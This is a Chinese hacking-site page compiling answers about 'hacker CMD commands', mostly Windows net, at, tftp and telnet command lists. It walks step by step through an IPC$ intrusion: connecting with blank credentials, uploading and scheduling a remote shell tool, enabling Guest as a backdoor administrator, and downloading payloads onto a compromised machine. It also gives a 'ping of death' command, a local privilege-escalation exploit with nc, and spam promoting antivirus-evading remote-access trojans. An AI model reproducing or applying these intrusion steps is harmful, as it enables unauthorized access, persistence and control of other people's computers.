破解软件

破解软件,破解密码,破解工具,破解论坛,破解技术

黑客cmd获取权限(cmd获取最高权限)

本文目录一览:

当黑客要懂得哪些主要的CMD命令?

net use \ip\ipc$ " " /user:" " 建立IPC空链接

net use \ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: \ip\c$ 登陆后映射对方C:到本地为H:

net use \ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具

有管理员权限,注意:***istrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \目标ip 查看对方时间

net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上

参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc

net share ipc$ /del 删除ipc

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip

协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的

用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设

置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]

数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之

ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,

ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装

目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安

装的,在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除

只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏

、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文

件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名 移动文件,

用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件

中," "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参

数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \ip\***$ 复制本地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成

3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指

ASCLL格式文件

copy \ip\***$\svv.exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe文件(所

有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址\目录名复制文件和目录树,用参数/Y将

不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe

登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二

进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模

式)进行传送

tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二

进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码

Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理

性的MAC地址。arp -a将显示出全部信息

arp -s ip 物理地址 想ARP高速缓存中人工输入一个静态项目 ,该项目在计算机引导过程中将保持有效状态,或者出现错误的时候 人工配置的物理地址将更新本项目

arp -d ip 本命令能人工栓除一个静态项目

start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程

序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读

,系统,隐藏属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时

间,/T:A显示文件上次被访问时间,/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和

时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p 显示以P开头的环境变量

黑客cmd命令如何进入别人电脑

要最新的免杀灰鸽子来梦想黑客联盟论坛拿

每天更新免杀,免费下载

详情到我空间有论坛网站地址

梦想黑客联盟现在免费开放注册

、欢迎大家一起交流学习

现在针对菜鸟每天晚上,免费在线授课

梦想黑客联盟私服架设技术免费教学

详情到我空间有论坛网站地址

[ 或者到我空间有论坛网站地址]

详情到我空间有论坛网站地址]

梦想黑客联盟私服架设技术免费教学

本站拥有强大的技术力量,每天更新各种语音教程免费下载

详情到我空间有论坛网站地址

每天晚上9点 梦想黑客联盟 在线课堂 欢迎大家来一起交流学习

有兴趣的可以去听听

有梦才有希望 ,记得是免费的啊

[ 或者到我空间有论坛网站地址]

出自梦想黑客联盟

最专业最权威的黑客技术论坛梦想黑客联盟现在免费开放注册

梦想黑客联盟私服架设技术免费教学

、欢迎大家一起交流学习。

跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\net time \\127.0.0.1

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32ntlm

输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤:

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功,连接你的肉鸡

常用的网络命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;

下面纯手打,上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

获得远程关机权限 使用cmd命令

在远程电脑上新建管理员组用户,自动赋予远程关机权限,可以从别的电脑远程关机,不是管理员组用户的话,在gpedit.msc组策略里"从远程系统强制关机",添加用户名或组即可.

cmd对黑客有用么?很有用的命令有哪些啊?

常用的命令:services.msc 启动服务

gpedit.msc 组策略

regedit 注册表

dir 查看磁盘、文件夹或者文件,比如dir c:\代表查看C盘

shutdown -s 关机

shutdown -r 重启

shutdown -l 注销

shutdown -a 放弃关机、注销或者重启

at 23:00 shutdown -s,在晚上11点关机

mem 查看内存状况

edit 文本编辑

tree 列目录树

chkdsk 检查磁盘

time 显示及修改时间

date 显示及修改日期

winver 检查windows版本

narrator 屏幕“讲述人”

cleanmgr 垃圾整理

nslookup或者ipconfig/all 检测本地IP

msconfig 显示开机启动

dxdiag 查看配置

Shutdown.exe -s -t 600 倒计时10分钟关机

如何利用命令提示符篡位夺取超级管理员的权限

可以越过XP管理员权限!因为设计缺陷,Windows桌面应用程序处理通过keybd_event() function函数发送的键盘事件时存在溢出错误,攻击者可以通过向以更高权限运行的桌面应用程序(如explorer.exe)发送恶意的键盘事件,使用管理员权限执行任意代码。这一漏洞可以使一个普通用户权限的账户使用管理员权限对系统进行任意操作。该漏洞影响的系统:Windows 2000,Windows XP,Windows2003。

准备好入侵工具

pulist:一款进程PID查看器,可以在命令提示符下查看当前系统进程的PID值。 keybd:键盘事件权限提升漏洞的溢出工具,通过它可以取得系统管理员权限。 nc:黑客入侵的“瑞士军刀”,系统端口监听利器,功能相当强大。

入侵过程

一、获得进程PID值

根据漏洞特点,我们需要获取一个桌面应用程序(如explorer.exe)的进程PID值。在系统的“任务管理器”中,我们是看不到进程的PID值的,所以我们需要借助一款可以查看系统进程PID值的小工具——pulist。在“命令提示符”中运行“pulist.exe”,即可显示当前系统进程的PID值,我们在其中找到“explorer.exe”进程的PID,这里是“1716”(如图)。

此主题相关图片如下:

小知识:进程的PID值指的是代表各进程的ID值。PID就是对各进程的身份标志,每个进程都有自己唯一的PID值。

二、提升账户权限

信息收集完毕,我们使用一个名为“888”的普通用户权限账户进行漏洞测试。我们运行“命令提示符”,输入“runas /user:888 cmd.exe”这个命令的意思是以用户“888”的权限运行一个命令提示符窗口,回车后系统会出现一个新的命令提示符窗口,其窗口标题为“cmd.exe(运行为888)”。这个命令提示符中我们的权限只是普通用户级别的,很多操作不能进行,例如添加删除用户等。当试图用该账户进行用户的添加删除操作时将会出现错误。

将下载回来的漏洞利用程序keybd解压到某个目录中,例如“c:”。此外我们还要用到远程监听工具nc,将它与keybd放在同一目录中。在命令提示符中进入keybd所在的文件夹,输入命令 “keybd.exe 1716”。回车,这时系统会跳出一个新的命令提示符窗口,表示keybd.exe已经溢出成功。

小提示:溢出时要保证系统的默认输入法为“英文”,否则将会使溢出失败。

溢出成功后,就该nc出马了。在命令提示符中进入nc所在的目录,然后输入“nc -vv localhost 65535”,回车后便出现了欢迎界面。这表示888账户已经获得管理员权限。我们接着输入“net user piao 123456 /add”新建一个账户名为piao,密码为123456的用户。然后输入“net localgroup administrators piao /add”,将账户piao加入系统的管理员组。这两个只有管理员权限才可以执行的命令都可以成功完成,入侵成功。

小提示:我们获取的管理员权限依赖于执行“keybd.exe”后弹出的命令提示符窗口,如果把这个弹出的命令提示符窗口关闭,以888账户运行的命令提示符会立刻回到普通用户权限,所以在执行命令的时候一定不可以将之关闭。

危害虽小,仍须防范

由于该漏洞是因为本地系统设计上的缺陷造成的,所以只能用于本地用户的权限提升,而且必须是本地登录的用户。但是不管漏洞如何之小,存在肯定会对系统造成严重的安全隐患,我们还是要修复漏洞,以防别有用心之人。

要利用漏洞就需要使用到“命令提示符”,我们可以通过限制“命令提示符”的运行权限使攻击者无从下手。首先在资源管理器中点击“工具”按钮,选择“文件夹选项”,切换到“查看”标签,去掉“使用简单文件共享(推荐)”前面的钩,这一步是为了让文件的属性菜单中显示“安全”标签。然后我们进入“c:windowssystem32”,找到“cmd.exe”,点右键选择“属性”,切换到“安全”标签,将其中“组或用户名称”中除了管理员外的所有用户都删除,完成后点“确定”,这样当普通用户想运行“命令提示符”的时候将会出现“拒绝访问”的警告框

  • 评论列表:
  •  性许卬妄
     发布于 2022-07-11 02:08:36  回复该评论
  • 近有哪些用户登陆telnet ip 端口远和登陆服务器,默认端口为23open ip 连接到IP(属telnet登陆后的命令)telnet 在本机上直接键入telnet 将
  •  边侣栖迟
     发布于 2022-07-11 01:50:57  回复该评论
  • rators 用户名 /add 把账户加入超级用户组获得远程关机权限 使用cmd命令在远程电脑上新建管理员组用户,自动赋予远程关机权限,可以从别的电脑远程关机,不是管理员组用户的话,在gpedit.msc组策略里"从远程系统强制关机",添加用户名或组即可.cmd对黑
  •  莣萳厌味
     发布于 2022-07-10 15:11:00  回复该评论
  • ools目录中)。8. C:\WINNT\system32ntlm 输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来
  •  囤梦挽鹿
     发布于 2022-07-11 00:02:54  回复该评论
  • 以只能用于本地用户的权限提升,而且必须是本地登录的用户。但是不管漏洞如何之小,存在肯定会对系统造成严重的安全隐患,我们还是要修复漏洞,以防别有用心之人。 要利用漏洞就需要使用到“命令提示符”,我们可以通过限制“命令提示符”的运行权限使攻击者无从下
  •  辞眸青尢
     发布于 2022-07-10 21:01:52  回复该评论
  • 1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。3. C:\net time \\127.0.0.1 查查时间

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.